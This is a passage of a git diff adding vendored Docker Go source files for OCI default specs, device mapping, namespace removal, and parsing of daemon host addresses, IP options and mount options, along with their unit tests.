"github.com/opencontainers/runtime-spec/specs-go" +) + +// DefaultSpec returns default oci spec used by docker. 
+func DefaultSpec() specs.Spec { + s := specs.Spec{ + Version: "0.6.0", + Platform: specs.Platform{ + OS: "SunOS", + Arch: runtime.GOARCH, + }, + } + s.Solaris = &specs.Solaris{} + return s +} diff --git a/vendor/github.com/docker/docker/oci/defaults_windows.go b/vendor/github.com/docker/docker/oci/defaults_windows.go new file mode 100644 index 0000000000..ab51904ec4 --- /dev/null +++ b/vendor/github.com/docker/docker/oci/defaults_windows.go @@ -0,0 +1,19 @@ +package oci + +import ( + "runtime" + + "github.com/opencontainers/runtime-spec/specs-go" +) + +// DefaultSpec returns default spec used by docker. +func DefaultSpec() specs.Spec { + return specs.Spec{ + Version: specs.Version, + Platform: specs.Platform{ + OS: runtime.GOOS, + Arch: runtime.GOARCH, + }, + Windows: &specs.Windows{}, + } +} diff --git a/vendor/github.com/docker/docker/oci/devices_linux.go b/vendor/github.com/docker/docker/oci/devices_linux.go new file mode 100644 index 0000000000..2840d2586a --- /dev/null +++ b/vendor/github.com/docker/docker/oci/devices_linux.go @@ -0,0 +1,86 @@ +package oci + +import ( + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/opencontainers/runc/libcontainer/configs" + "github.com/opencontainers/runc/libcontainer/devices" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// Device transforms a libcontainer configs.Device to a specs.Device object. +func Device(d *configs.Device) specs.Device { + return specs.Device{ + Type: string(d.Type), + Path: d.Path, + Major: d.Major, + Minor: d.Minor, + FileMode: fmPtr(int64(d.FileMode)), + UID: u32Ptr(int64(d.Uid)), + GID: u32Ptr(int64(d.Gid)), + } +} + +func deviceCgroup(d *configs.Device) specs.DeviceCgroup { + t := string(d.Type) + return specs.DeviceCgroup{ + Allow: true, + Type: &t, + Major: &d.Major, + Minor: &d.Minor, + Access: &d.Permissions, + } +} + +// DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions. 
+func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) { + resolvedPathOnHost := pathOnHost + + // check if it is a symbolic link + if src, e := os.Lstat(pathOnHost); e == nil && src.Mode()&os.ModeSymlink == os.ModeSymlink { + if linkedPathOnHost, e := filepath.EvalSymlinks(pathOnHost); e == nil { + resolvedPathOnHost = linkedPathOnHost + } + } + + device, err := devices.DeviceFromPath(resolvedPathOnHost, cgroupPermissions) + // if there was no error, return the device + if err == nil { + device.Path = pathInContainer + return append(devs, Device(device)), append(devPermissions, deviceCgroup(device)), nil + } + + // if the device is not a device node + // try to see if it's a directory holding many devices + if err == devices.ErrNotADevice { + + // check if it is a directory + if src, e := os.Stat(resolvedPathOnHost); e == nil && src.IsDir() { + + // mount the internal devices recursively + filepath.Walk(resolvedPathOnHost, func(dpath string, f os.FileInfo, e error) error { + childDevice, e := devices.DeviceFromPath(dpath, cgroupPermissions) + if e != nil { + // ignore the device + return nil + } + + // add the device to userSpecified devices + childDevice.Path = strings.Replace(dpath, resolvedPathOnHost, pathInContainer, 1) + devs = append(devs, Device(childDevice)) + devPermissions = append(devPermissions, deviceCgroup(childDevice)) + + return nil + }) + } + } + + if len(devs) > 0 { + return devs, devPermissions, nil + } + + return devs, devPermissions, fmt.Errorf("error gathering device information while adding custom device %q: %s", pathOnHost, err) +} diff --git a/vendor/github.com/docker/docker/oci/devices_unsupported.go b/vendor/github.com/docker/docker/oci/devices_unsupported.go new file mode 100644 index 0000000000..6252cab536 --- /dev/null +++ b/vendor/github.com/docker/docker/oci/devices_unsupported.go @@ -0,0 +1,20 @@ +// +build !linux + +package oci + +import ( 
+ "errors" + + "github.com/opencontainers/runc/libcontainer/configs" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// Device transforms a libcontainer configs.Device to a specs.Device object. +// Not implemented +func Device(d *configs.Device) specs.Device { return specs.Device{} } + +// DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions. +// Not implemented +func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) { + return nil, nil, errors.New("oci/devices: unsupported platform") +} diff --git a/vendor/github.com/docker/docker/oci/namespaces.go b/vendor/github.com/docker/docker/oci/namespaces.go new file mode 100644 index 0000000000..4902482498 --- /dev/null +++ b/vendor/github.com/docker/docker/oci/namespaces.go @@ -0,0 +1,16 @@ +package oci + +import specs "github.com/opencontainers/runtime-spec/specs-go" + +// RemoveNamespace removes the `nsType` namespace from OCI spec `s` +func RemoveNamespace(s *specs.Spec, nsType specs.NamespaceType) { + idx := -1 + for i, n := range s.Linux.Namespaces { + if n.Type == nsType { + idx = i + } + } + if idx >= 0 { + s.Linux.Namespaces = append(s.Linux.Namespaces[:idx], s.Linux.Namespaces[idx+1:]...) + } +} diff --git a/vendor/github.com/docker/docker/opts/hosts.go b/vendor/github.com/docker/docker/opts/hosts.go new file mode 100644 index 0000000000..266df1e537 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/hosts.go @@ -0,0 +1,151 @@ +package opts + +import ( + "fmt" + "net" + "net/url" + "strconv" + "strings" +) + +var ( + // DefaultHTTPPort Default HTTP Port used if only the protocol is provided to -H flag e.g. 
docker daemon -H tcp:// + // These are the IANA registered port numbers for use with Docker + // see http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=docker + DefaultHTTPPort = 2375 // Default HTTP Port + // DefaultTLSHTTPPort Default HTTP Port used when TLS enabled + DefaultTLSHTTPPort = 2376 // Default TLS encrypted HTTP Port + // DefaultUnixSocket Path for the unix socket. + // Docker daemon by default always listens on the default unix socket + DefaultUnixSocket = "/var/run/docker.sock" + // DefaultTCPHost constant defines the default host string used by docker on Windows + DefaultTCPHost = fmt.Sprintf("tcp://%s:%d", DefaultHTTPHost, DefaultHTTPPort) + // DefaultTLSHost constant defines the default host string used by docker for TLS sockets + DefaultTLSHost = fmt.Sprintf("tcp://%s:%d", DefaultHTTPHost, DefaultTLSHTTPPort) + // DefaultNamedPipe defines the default named pipe used by docker on Windows + DefaultNamedPipe = `//./pipe/docker_engine` +) + +// ValidateHost validates that the specified string is a valid host and returns it. 
+func ValidateHost(val string) (string, error) { + host := strings.TrimSpace(val) + // The empty string means default and is not handled by parseDockerDaemonHost + if host != "" { + _, err := parseDockerDaemonHost(host) + if err != nil { + return val, err + } + } + // Note: unlike most flag validators, we don't return the mutated value here + // we need to know what the user entered later (using ParseHost) to adjust for tls + return val, nil +} + +// ParseHost and set defaults for a Daemon host string +func ParseHost(defaultToTLS bool, val string) (string, error) { + host := strings.TrimSpace(val) + if host == "" { + if defaultToTLS { + host = DefaultTLSHost + } else { + host = DefaultHost + } + } else { + var err error + host, err = parseDockerDaemonHost(host) + if err != nil { + return val, err + } + } + return host, nil +} + +// parseDockerDaemonHost parses the specified address and returns an address that will be used as the host. +// Depending of the address specified, this may return one of the global Default* strings defined in hosts.go. +func parseDockerDaemonHost(addr string) (string, error) { + addrParts := strings.SplitN(addr, "://", 2) + if len(addrParts) == 1 && addrParts[0] != "" { + addrParts = []string{"tcp", addrParts[0]} + } + + switch addrParts[0] { + case "tcp": + return ParseTCPAddr(addrParts[1], DefaultTCPHost) + case "unix": + return parseSimpleProtoAddr("unix", addrParts[1], DefaultUnixSocket) + case "npipe": + return parseSimpleProtoAddr("npipe", addrParts[1], DefaultNamedPipe) + case "fd": + return addr, nil + default: + return "", fmt.Errorf("Invalid bind address format: %s", addr) + } +} + +// parseSimpleProtoAddr parses and validates that the specified address is a valid +// socket address for simple protocols like unix and npipe. It returns a formatted +// socket address, either using the address parsed from addr, or the contents of +// defaultAddr if addr is a blank string. 
+func parseSimpleProtoAddr(proto, addr, defaultAddr string) (string, error) { + addr = strings.TrimPrefix(addr, proto+"://") + if strings.Contains(addr, "://") { + return "", fmt.Errorf("Invalid proto, expected %s: %s", proto, addr) + } + if addr == "" { + addr = defaultAddr + } + return fmt.Sprintf("%s://%s", proto, addr), nil +} + +// ParseTCPAddr parses and validates that the specified address is a valid TCP +// address. It returns a formatted TCP address, either using the address parsed +// from tryAddr, or the contents of defaultAddr if tryAddr is a blank string. +// tryAddr is expected to have already been Trim()'d +// defaultAddr must be in the full `tcp://host:port` form +func ParseTCPAddr(tryAddr string, defaultAddr string) (string, error) { + if tryAddr == "" || tryAddr == "tcp://" { + return defaultAddr, nil + } + addr := strings.TrimPrefix(tryAddr, "tcp://") + if strings.Contains(addr, "://") || addr == "" { + return "", fmt.Errorf("Invalid proto, expected tcp: %s", tryAddr) + } + + defaultAddr = strings.TrimPrefix(defaultAddr, "tcp://") + defaultHost, defaultPort, err := net.SplitHostPort(defaultAddr) + if err != nil { + return "", err + } + // url.Parse fails for trailing colon on IPv6 brackets on Go 1.5, but + // not 1.4. See https://github.com/golang/go/issues/12200 and + // https://github.com/golang/go/issues/6530. 
+ if strings.HasSuffix(addr, "]:") { + addr += defaultPort + } + + u, err := url.Parse("tcp://" + addr) + if err != nil { + return "", err + } + host, port, err := net.SplitHostPort(u.Host) + if err != nil { + // try port addition once + host, port, err = net.SplitHostPort(net.JoinHostPort(u.Host, defaultPort)) + } + if err != nil { + return "", fmt.Errorf("Invalid bind address format: %s", tryAddr) + } + + if host == "" { + host = defaultHost + } + if port == "" { + port = defaultPort + } + p, err := strconv.Atoi(port) + if err != nil && p == 0 { + return "", fmt.Errorf("Invalid bind address format: %s", tryAddr) + } + + return fmt.Sprintf("tcp://%s%s", net.JoinHostPort(host, port), u.Path), nil +} diff --git a/vendor/github.com/docker/docker/opts/hosts_test.go b/vendor/github.com/docker/docker/opts/hosts_test.go new file mode 100644 index 0000000000..a5bec30d4c --- /dev/null +++ b/vendor/github.com/docker/docker/opts/hosts_test.go @@ -0,0 +1,148 @@ +package opts + +import ( + "fmt" + "testing" +) + +func TestParseHost(t *testing.T) { + invalid := []string{ + "something with spaces", + "://", + "unknown://", + "tcp://:port", + "tcp://invalid:port", + } + + valid := map[string]string{ + "": DefaultHost, + " ": DefaultHost, + " ": DefaultHost, + "fd://": "fd://", + "fd://something": "fd://something", + "tcp://host:": fmt.Sprintf("tcp://host:%d", DefaultHTTPPort), + "tcp://": DefaultTCPHost, + "tcp://:2375": fmt.Sprintf("tcp://%s:2375", DefaultHTTPHost), + "tcp://:2376": fmt.Sprintf("tcp://%s:2376", DefaultHTTPHost), + "tcp://0.0.0.0:8080": "tcp://0.0.0.0:8080", + "tcp://192.168.0.0:12000": "tcp://192.168.0.0:12000", + "tcp://192.168:8080": "tcp://192.168:8080", + "tcp://0.0.0.0:1234567890": "tcp://0.0.0.0:1234567890", // yeah it's valid :P + " tcp://:7777/path ": fmt.Sprintf("tcp://%s:7777/path", DefaultHTTPHost), + "tcp://docker.com:2375": "tcp://docker.com:2375", + "unix://": "unix://" + DefaultUnixSocket, + "unix://path/to/socket": "unix://path/to/socket", + 
"npipe://": "npipe://" + DefaultNamedPipe, + "npipe:////./pipe/foo": "npipe:////./pipe/foo", + } + + for _, value := range invalid { + if _, err := ParseHost(false, value); err == nil { + t.Errorf("Expected an error for %v, got [nil]", value) + } + } + + for value, expected := range valid { + if actual, err := ParseHost(false, value); err != nil || actual != expected { + t.Errorf("Expected for %v [%v], got [%v, %v]", value, expected, actual, err) + } + } +} + +func TestParseDockerDaemonHost(t *testing.T) { + invalids := map[string]string{ + + "tcp:a.b.c.d": "Invalid bind address format: tcp:a.b.c.d", + "tcp:a.b.c.d/path": "Invalid bind address format: tcp:a.b.c.d/path", + "udp://127.0.0.1": "Invalid bind address format: udp://127.0.0.1", + "udp://127.0.0.1:2375": "Invalid bind address format: udp://127.0.0.1:2375", + "tcp://unix:///run/docker.sock": "Invalid proto, expected tcp: unix:///run/docker.sock", + " tcp://:7777/path ": "Invalid bind address format: tcp://:7777/path ", + "": "Invalid bind address format: ", + } + valids := map[string]string{ + "0.0.0.1:": "tcp://0.0.0.1:2375", + "0.0.0.1:5555": "tcp://0.0.0.1:5555", + "0.0.0.1:5555/path": "tcp://0.0.0.1:5555/path", + "[::1]:": "tcp://[::1]:2375", + "[::1]:5555/path": "tcp://[::1]:5555/path", + "[0:0:0:0:0:0:0:1]:": "tcp://[0:0:0:0:0:0:0:1]:2375", + "[0:0:0:0:0:0:0:1]:5555/path": "tcp://[0:0:0:0:0:0:0:1]:5555/path", + ":6666": fmt.Sprintf("tcp://%s:6666", DefaultHTTPHost), + ":6666/path": fmt.Sprintf("tcp://%s:6666/path", DefaultHTTPHost), + "tcp://": DefaultTCPHost, + "tcp://:7777": fmt.Sprintf("tcp://%s:7777", DefaultHTTPHost), + "tcp://:7777/path": fmt.Sprintf("tcp://%s:7777/path", DefaultHTTPHost), + "unix:///run/docker.sock": "unix:///run/docker.sock", + "unix://": "unix://" + DefaultUnixSocket, + "fd://": "fd://", + "fd://something": "fd://something", + "localhost:": "tcp://localhost:2375", + "localhost:5555": "tcp://localhost:5555", + "localhost:5555/path": "tcp://localhost:5555/path", + } + for 
invalidAddr, expectedError := range invalids { + if addr, err := parseDockerDaemonHost(invalidAddr); err == nil || err.Error() != expectedError { + t.Errorf("tcp %v address expected error %q return, got %q and addr %v", invalidAddr, expectedError, err, addr) + } + } + for validAddr, expectedAddr := range valids { + if addr, err := parseDockerDaemonHost(validAddr); err != nil || addr != expectedAddr { + t.Errorf("%v -> expected %v, got (%v) addr (%v)", validAddr, expectedAddr, err, addr) + } + } +} + +func TestParseTCP(t *testing.T) { + var ( + defaultHTTPHost = "tcp://127.0.0.1:2376" + ) + invalids := map[string]string{ + "tcp:a.b.c.d": "Invalid bind address format: tcp:a.b.c.d", + "tcp:a.b.c.d/path": "Invalid bind address format: tcp:a.b.c.d/path", + "udp://127.0.0.1": "Invalid proto, expected tcp: udp://127.0.0.1", + "udp://127.0.0.1:2375": "Invalid proto, expected tcp: udp://127.0.0.1:2375", + } + valids := map[string]string{ + "": defaultHTTPHost, + "tcp://": defaultHTTPHost, + "0.0.0.1:": "tcp://0.0.0.1:2376", + "0.0.0.1:5555": "tcp://0.0.0.1:5555", + "0.0.0.1:5555/path": "tcp://0.0.0.1:5555/path", + ":6666": "tcp://127.0.0.1:6666", + ":6666/path": "tcp://127.0.0.1:6666/path", + "tcp://:7777": "tcp://127.0.0.1:7777", + "tcp://:7777/path": "tcp://127.0.0.1:7777/path", + "[::1]:": "tcp://[::1]:2376", + "[::1]:5555": "tcp://[::1]:5555", + "[::1]:5555/path": "tcp://[::1]:5555/path", + "[0:0:0:0:0:0:0:1]:": "tcp://[0:0:0:0:0:0:0:1]:2376", + "[0:0:0:0:0:0:0:1]:5555": "tcp://[0:0:0:0:0:0:0:1]:5555", + "[0:0:0:0:0:0:0:1]:5555/path": "tcp://[0:0:0:0:0:0:0:1]:5555/path", + "localhost:": "tcp://localhost:2376", + "localhost:5555": "tcp://localhost:5555", + "localhost:5555/path": "tcp://localhost:5555/path", + } + for invalidAddr, expectedError := range invalids { + if addr, err := ParseTCPAddr(invalidAddr, defaultHTTPHost); err == nil || err.Error() != expectedError { + t.Errorf("tcp %v address expected error %v return, got %s and addr %v", invalidAddr, expectedError, 
err, addr) + } + } + for validAddr, expectedAddr := range valids { + if addr, err := ParseTCPAddr(validAddr, defaultHTTPHost); err != nil || addr != expectedAddr { + t.Errorf("%v -> expected %v, got %v and addr %v", validAddr, expectedAddr, err, addr) + } + } +} + +func TestParseInvalidUnixAddrInvalid(t *testing.T) { + if _, err := parseSimpleProtoAddr("unix", "tcp://127.0.0.1", "unix:///var/run/docker.sock"); err == nil || err.Error() != "Invalid proto, expected unix: tcp://127.0.0.1" { + t.Fatalf("Expected an error, got %v", err) + } + if _, err := parseSimpleProtoAddr("unix", "unix://tcp://127.0.0.1", "/var/run/docker.sock"); err == nil || err.Error() != "Invalid proto, expected unix: tcp://127.0.0.1" { + t.Fatalf("Expected an error, got %v", err) + } + if v, err := parseSimpleProtoAddr("unix", "", "/var/run/docker.sock"); err != nil || v != "unix:///var/run/docker.sock" { + t.Fatalf("Expected an %v, got %v", v, "unix:///var/run/docker.sock") + } +} diff --git a/vendor/github.com/docker/docker/opts/hosts_unix.go b/vendor/github.com/docker/docker/opts/hosts_unix.go new file mode 100644 index 0000000000..611407a9d9 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/hosts_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package opts + +import "fmt" + +// DefaultHost constant defines the default host string used by docker on other hosts than Windows +var DefaultHost = fmt.Sprintf("unix://%s", DefaultUnixSocket) diff --git a/vendor/github.com/docker/docker/opts/hosts_windows.go b/vendor/github.com/docker/docker/opts/hosts_windows.go new file mode 100644 index 0000000000..7c239e00f1 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/hosts_windows.go @@ -0,0 +1,6 @@ +// +build windows + +package opts + +// DefaultHost constant defines the default host string used by docker on Windows +var DefaultHost = "npipe://" + DefaultNamedPipe diff --git a/vendor/github.com/docker/docker/opts/ip.go b/vendor/github.com/docker/docker/opts/ip.go new file mode 100644 index 
0000000000..fb03b50111 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/ip.go @@ -0,0 +1,47 @@ +package opts + +import ( + "fmt" + "net" +) + +// IPOpt holds an IP. It is used to store values from CLI flags. +type IPOpt struct { + *net.IP +} + +// NewIPOpt creates a new IPOpt from a reference net.IP and a +// string representation of an IP. If the string is not a valid +// IP it will fallback to the specified reference. +func NewIPOpt(ref *net.IP, defaultVal string) *IPOpt { + o := &IPOpt{ + IP: ref, + } + o.Set(defaultVal) + return o +} + +// Set sets an IPv4 or IPv6 address from a given string. If the given +// string is not parseable as an IP address it returns an error. +func (o *IPOpt) Set(val string) error { + ip := net.ParseIP(val) + if ip == nil { + return fmt.Errorf("%s is not an ip address", val) + } + *o.IP = ip + return nil +} + +// String returns the IP address stored in the IPOpt. If stored IP is a +// nil pointer, it returns an empty string. +func (o *IPOpt) String() string { + if *o.IP == nil { + return "" + } + return o.IP.String() +} + +// Type returns the type of the option +func (o *IPOpt) Type() string { + return "ip" +} diff --git a/vendor/github.com/docker/docker/opts/ip_test.go b/vendor/github.com/docker/docker/opts/ip_test.go new file mode 100644 index 0000000000..1027d84a05 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/ip_test.go @@ -0,0 +1,54 @@ +package opts + +import ( + "net" + "testing" +) + +func TestIpOptString(t *testing.T) { + addresses := []string{"", "0.0.0.0"} + var ip net.IP + + for _, address := range addresses { + stringAddress := NewIPOpt(&ip, address).String() + if stringAddress != address { + t.Fatalf("IpOpt string should be `%s`, not `%s`", address, stringAddress) + } + } +} + +func TestNewIpOptInvalidDefaultVal(t *testing.T) { + ip := net.IPv4(127, 0, 0, 1) + defaultVal := "Not an ip" + + ipOpt := NewIPOpt(&ip, defaultVal) + + expected := "127.0.0.1" + if ipOpt.String() != expected { + 
t.Fatalf("Expected [%v], got [%v]", expected, ipOpt.String()) + } +} + +func TestNewIpOptValidDefaultVal(t *testing.T) { + ip := net.IPv4(127, 0, 0, 1) + defaultVal := "192.168.1.1" + + ipOpt := NewIPOpt(&ip, defaultVal) + + expected := "192.168.1.1" + if ipOpt.String() != expected { + t.Fatalf("Expected [%v], got [%v]", expected, ipOpt.String()) + } +} + +func TestIpOptSetInvalidVal(t *testing.T) { + ip := net.IPv4(127, 0, 0, 1) + ipOpt := &IPOpt{IP: &ip} + + invalidIP := "invalid ip" + expectedError := "invalid ip is not an ip address" + err := ipOpt.Set(invalidIP) + if err == nil || err.Error() != expectedError { + t.Fatalf("Expected an Error with [%v], got [%v]", expectedError, err.Error()) + } +} diff --git a/vendor/github.com/docker/docker/opts/mount.go b/vendor/github.com/docker/docker/opts/mount.go new file mode 100644 index 0000000000..ce6383ddca --- /dev/null +++ b/vendor/github.com/docker/docker/opts/mount.go @@ -0,0 +1,171 @@ +package opts + +import ( + "encoding/csv" + "fmt" + "os" + "strconv" + "strings" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/go-units" +) + +// MountOpt is a Value type for parsing mounts +type MountOpt struct { + values []mounttypes.Mount +} + +// Set a new mount value +func (m *MountOpt) Set(value string) error { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + mount := mounttypes.Mount{} + + volumeOptions := func() *mounttypes.VolumeOptions { + if mount.VolumeOptions == nil { + mount.VolumeOptions = &mounttypes.VolumeOptions{ + Labels: make(map[string]string), + } + } + if mount.VolumeOptions.DriverConfig == nil { + mount.VolumeOptions.DriverConfig = &mounttypes.Driver{} + } + return mount.VolumeOptions + } + + bindOptions := func() *mounttypes.BindOptions { + if mount.BindOptions == nil { + mount.BindOptions = new(mounttypes.BindOptions) + } + return mount.BindOptions + } + + tmpfsOptions := func() 
*mounttypes.TmpfsOptions { + if mount.TmpfsOptions == nil { + mount.TmpfsOptions = new(mounttypes.TmpfsOptions) + } + return mount.TmpfsOptions + } + + setValueOnMap := func(target map[string]string, value string) { + parts := strings.SplitN(value, "=", 2) + if len(parts) == 1 { + target[value] = "" + } else { + target[parts[0]] = parts[1] + } + } + + mount.Type = mounttypes.TypeVolume // default to volume mounts + // Set writable as the default + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + key := strings.ToLower(parts[0]) + + if len(parts) == 1 { + switch key { + case "readonly", "ro": + mount.ReadOnly = true + continue + case "volume-nocopy": + volumeOptions().NoCopy = true + continue + } + } + + if len(parts) != 2 { + return fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + value := parts[1] + switch key { + case "type": + mount.Type = mounttypes.Type(strings.ToLower(value)) + case "source", "src": + mount.Source = value + case "target", "dst", "destination": + mount.Target = value + case "readonly", "ro": + mount.ReadOnly, err = strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for %s: %s", key, value) + } + case "bind-propagation": + bindOptions().Propagation = mounttypes.Propagation(strings.ToLower(value)) + case "volume-nocopy": + volumeOptions().NoCopy, err = strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for populate: %s", value) + } + case "volume-label": + setValueOnMap(volumeOptions().Labels, value) + case "volume-driver": + volumeOptions().DriverConfig.Name = value + case "volume-opt": + if volumeOptions().DriverConfig.Options == nil { + volumeOptions().DriverConfig.Options = make(map[string]string) + } + setValueOnMap(volumeOptions().DriverConfig.Options, value) + case "tmpfs-size": + sizeBytes, err := units.RAMInBytes(value) + if err != nil { + return fmt.Errorf("invalid value for %s: %s", key, value) + } + tmpfsOptions().SizeBytes = 
sizeBytes + case "tmpfs-mode": + ui64, err := strconv.ParseUint(value, 8, 32) + if err != nil { + return fmt.Errorf("invalid value for %s: %s", key, value) + } + tmpfsOptions().Mode = os.FileMode(ui64) + default: + return fmt.Errorf("unexpected key '%s' in '%s'", key, field) + } + } + + if mount.Type == "" { + return fmt.Errorf("type is required") + } + + if mount.Target == "" { + return fmt.Errorf("target is required") + } + + if mount.VolumeOptions != nil && mount.Type != mounttypes.TypeVolume { + return fmt.Errorf("cannot mix 'volume-*' options with mount type '%s'", mount.Type) + } + if mount.BindOptions != nil && mount.Type != mounttypes.TypeBind { + return fmt.Errorf("cannot mix 'bind-*' options with mount type '%s'", mount.Type) + } + if mount.TmpfsOptions != nil && mount.Type != mounttypes.TypeTmpfs { + return fmt.Errorf("cannot mix 'tmpfs-*' options with mount type '%s'", mount.Type) + } + + m.values = append(m.values, mount) + return nil +} + +// Type returns the type of this option +func (m *MountOpt) Type() string { + return "mount" +} + +// String returns a string repr of this option +func (m *MountOpt) String() string { + mounts := []string{} + for _, mount := range m.values { + repr := fmt.Sprintf("%s %s %s", mount.Type, mount.Source, mount.Target) + mounts = append(mounts, repr) + } + return strings.Join(mounts, ", ") +} + +// Value returns the mounts +func (m *MountOpt) Value() []mounttypes.Mount { + return m.values +} diff --git a/vendor/github.com/docker/docker/opts/mount_test.go b/vendor/github.com/docker/docker/opts/mount_test.go new file mode 100644 index 0000000000..59606c38e2 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/mount_test.go @@ -0,0 +1,184 @@ +package opts + +import ( + "os" + "testing" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestMountOptString(t *testing.T) { + mount := MountOpt{ + values: []mounttypes.Mount{ + { + Type: mounttypes.TypeBind, + 
Source: "/home/path", + Target: "/target", + }, + { + Type: mounttypes.TypeVolume, + Source: "foo", + Target: "/target/foo", + }, + }, + } + expected := "bind /home/path /target, volume foo /target/foo" + assert.Equal(t, mount.String(), expected) +} + +func TestMountOptSetBindNoErrorBind(t *testing.T) { + for _, testcase := range []string{ + // tests several aliases that should have same result. + "type=bind,target=/target,source=/source", + "type=bind,src=/source,dst=/target", + "type=bind,source=/source,dst=/target", + "type=bind,src=/source,target=/target", + } { + var mount MountOpt + + assert.NilError(t, mount.Set(testcase)) + + mounts := mount.Value() + assert.Equal(t, len(mounts), 1) + assert.Equal(t, mounts[0], mounttypes.Mount{ + Type: mounttypes.TypeBind, + Source: "/source", + Target: "/target", + }) + } +} + +func TestMountOptSetVolumeNoError(t *testing.T) { + for _, testcase := range []string{ + // tests several aliases that should have same result. + "type=volume,target=/target,source=/source", + "type=volume,src=/source,dst=/target", + "type=volume,source=/source,dst=/target", + "type=volume,src=/source,target=/target", + } { + var mount MountOpt + + assert.NilError(t, mount.Set(testcase)) + + mounts := mount.Value() + assert.Equal(t, len(mounts), 1) + assert.Equal(t, mounts[0], mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "/source", + Target: "/target", + }) + } +} + +// TestMountOptDefaultType ensures that a mount without the type defaults to a +// volume mount. 
+func TestMountOptDefaultType(t *testing.T) { + var mount MountOpt + assert.NilError(t, mount.Set("target=/target,source=/foo")) + assert.Equal(t, mount.values[0].Type, mounttypes.TypeVolume) +} + +func TestMountOptSetErrorNoTarget(t *testing.T) { + var mount MountOpt + assert.Error(t, mount.Set("type=volume,source=/foo"), "target is required") +} + +func TestMountOptSetErrorInvalidKey(t *testing.T) { + var mount MountOpt + assert.Error(t, mount.Set("type=volume,bogus=foo"), "unexpected key 'bogus'") +} + +func TestMountOptSetErrorInvalidField(t *testing.T) { + var mount MountOpt + assert.Error(t, mount.Set("type=volume,bogus"), "invalid field 'bogus'") +} + +func TestMountOptSetErrorInvalidReadOnly(t *testing.T) { + var mount MountOpt + assert.Error(t, mount.Set("type=volume,readonly=no"), "invalid value for readonly: no") + assert.Error(t, mount.Set("type=volume,readonly=invalid"), "invalid value for readonly: invalid") +} + +func TestMountOptDefaultEnableReadOnly(t *testing.T) { + var m MountOpt + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo")) + assert.Equal(t, m.values[0].ReadOnly, false) + + m = MountOpt{} + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly")) + assert.Equal(t, m.values[0].ReadOnly, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=1")) + assert.Equal(t, m.values[0].ReadOnly, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=true")) + assert.Equal(t, m.values[0].ReadOnly, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=0")) + assert.Equal(t, m.values[0].ReadOnly, false) +} + +func TestMountOptVolumeNoCopy(t *testing.T) { + var m MountOpt + assert.NilError(t, m.Set("type=volume,target=/foo,volume-nocopy")) + assert.Equal(t, m.values[0].Source, "") + + m = MountOpt{} + assert.NilError(t, m.Set("type=volume,target=/foo,source=foo")) + assert.Equal(t, 
m.values[0].VolumeOptions == nil, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=true")) + assert.Equal(t, m.values[0].VolumeOptions != nil, true) + assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy")) + assert.Equal(t, m.values[0].VolumeOptions != nil, true) + assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=1")) + assert.Equal(t, m.values[0].VolumeOptions != nil, true) + assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) +} + +func TestMountOptTypeConflict(t *testing.T) { + var m MountOpt + assert.Error(t, m.Set("type=bind,target=/foo,source=/foo,volume-nocopy=true"), "cannot mix") + assert.Error(t, m.Set("type=volume,target=/foo,source=/foo,bind-propagation=rprivate"), "cannot mix") +} + +func TestMountOptSetTmpfsNoError(t *testing.T) { + for _, testcase := range []string{ + // tests several aliases that should have same result. 
